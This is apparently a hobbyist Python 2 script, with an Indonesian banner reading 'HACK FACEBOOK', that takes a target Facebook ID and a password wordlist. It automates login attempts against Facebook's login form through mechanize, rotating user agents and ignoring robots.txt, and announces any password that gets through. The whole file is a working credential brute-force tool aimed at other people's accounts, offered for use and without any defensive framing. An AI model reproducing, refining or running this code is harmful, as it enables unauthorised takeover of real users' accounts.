#!/usr/bin/env python

# -\*- coding: UTF-8 -\*-

import os

import sys

import mechanize

import cookielib

import random

import time

os.system('clear')

def runntek(s):

        for c in s + '\n':

                sys.stdout.write(c)

                sys.stdout.flush()

                time.sleep(10. / 100)

if sys.platform == "linux" or sys.platform == "linux2":

     GL = "\033[96;1m" # Blue aqua

     BB = "\033[34;1m" # Blue light

     YY = "\033[33;1m" # Yellow light

     GG = "\033[32;1m" # Green light

     WW = "\033[0;1m" # White light

     RR = "\033[31;1m" # Red light

     CC = "\033[36;1m" # Cyan light

     B = "\033[34m" # Blue

     Y = "\033[33;1m" # Yellow

     G = "\033[32m" # Green

     W = "\033[0;1m" # White

     R = "\033[31m" # Red

     C = "\033[36;1m" # Cyan

     rand = (BB,YY,GG,WW,RR,CC)

     P = random.choice(rand)

def cover():

    print """

"""

    runntek(GL+" Assalamu'@laikum. ^\_^...")

    time.sleep(1)

    print " "

    print RR+" +============================================+"

    print GG+" |•••••••• HACK FACEBOOK MAS ^\_^ •••••••••|"

    print RR+" +============================================+"

    print WW+" | MOD BY: Garetz88 |"

    print GG+" | Berdoa Dulu Sebelum Menggunakan |"

    print WW+" | FACEBOOK: Riyan Fahmi |"

    print Y+" | INSTAGRAM: garetz88 |"

    print WW+" |--------------------------------------------|"

    print GL+" | LIFE OF PROGRAMMER [ L.O.P ] |"

    print WW+" |--------------------------------------------|"

    print RR+" +============================================+"

    print GG+" |•••••••• HACK FACEBOOK MAS ^\_^ •••••••••|"

    print RR+" +============================================+"

cover()

email = str(raw\_input(GL+" •Masukkan ID Target\033[33;1m: "))

passwordlist = str(raw\_input(WW+" •Masukkan File Wordlist \033[95m[ pass.txt ] \033[92;1m: "))

#login = 'https://m.facebook.com/login/?ref=dbl&fl&refid=8'

login = 'https://www.facebook.com/login.php?login\_attempt=1'

useragents = [('Mozilla/5.0 (X11; Linux x86\_64; rv:45.0) Gecko/20100101 Firefox/45.0','Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Geck')]

def runntek(s):

        for c in s + '\n':

                sys.stdout.write(c)

                sys.stdout.flush()

                time.sleep(10. / 100)

def main():

        global br

        br = mechanize.Browser()

        cj = cookielib.LWPCookieJar()

        br.set\_handle\_robots(False)

        br.set\_handle\_redirect(True)

        br.set\_cookiejar(cj)

        br.set\_handle\_equiv(True)

        br.set\_handle\_referer(True)

        br.set\_handle\_refresh(mechanize.\_http.HTTPRefreshProcessor(), max\_time=1)

        welcome()

        search()

        print " "

        runntek(RR+" Wordlis Tidak Ada yang Cocok")

        runntek(RR+" Kembangin Wordlistnya Sendiri Cuk")

        time.sleep(1)

        print WW+34\*" -"

        kol()

def kol():

    nok = raw\_input("Edit wordlist cuk.? \033[96;1m[y/n]: ")

    if nok == "y":

        print ("Silahkan tulis perintah \033[92;1m[ nano pass.txt ] !")

        print WW+(41\*"-")

        print GL+(" ")

        os.sys.exit()

    else:

        exit(0)

def brute(password):

        sys.stdout.write(GG+"\r[+]\033[97;1m Mencoba ..... {}\n".format(password))

        sys.stdout.flush()

        br.addheaders = [('User-agent', random.choice(useragents))]

        site = br.open(login)

        br.select\_form(nr = 0)

        br.form['email'] = email

        br.form['pass'] = password

        sub = br.submit()

        log = sub.geturl()

        if log != login and (not 'login\_attempt' in log):

                        print("\033[92;1m\n\n[+]\033[97;1m Password Find \033[31;1m===| \033[96;1m{}".format(password))

                        print " "

                        raw\_input(WW+"TEKAN ENTER UNTUK KELUAR.....")

                        sys.exit(1)

def search():

        global password

        passwords = open(passwordlist,"r")

        for password in passwords:

                passwords = password.replace("\n","")

                brute(password)

#welcome

def welcome():

        wel = GG+"""

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\033[96;4mLife Of Programmer\033[92;1m

|\_|

"""

        print wel

        print " "

        total = open(passwordlist,"r")

        total = total.readlines()

        print " "

        print GL+" [\*] Account to crack : {}".format(email)

        print RR+" [\*] Jmlah :" , len(total),WW+ "passwords"

        print Y+" [\*] Cracking, please wait .....\n\n"

if \_\_name\_\_ == '\_\_main\_\_':

        main()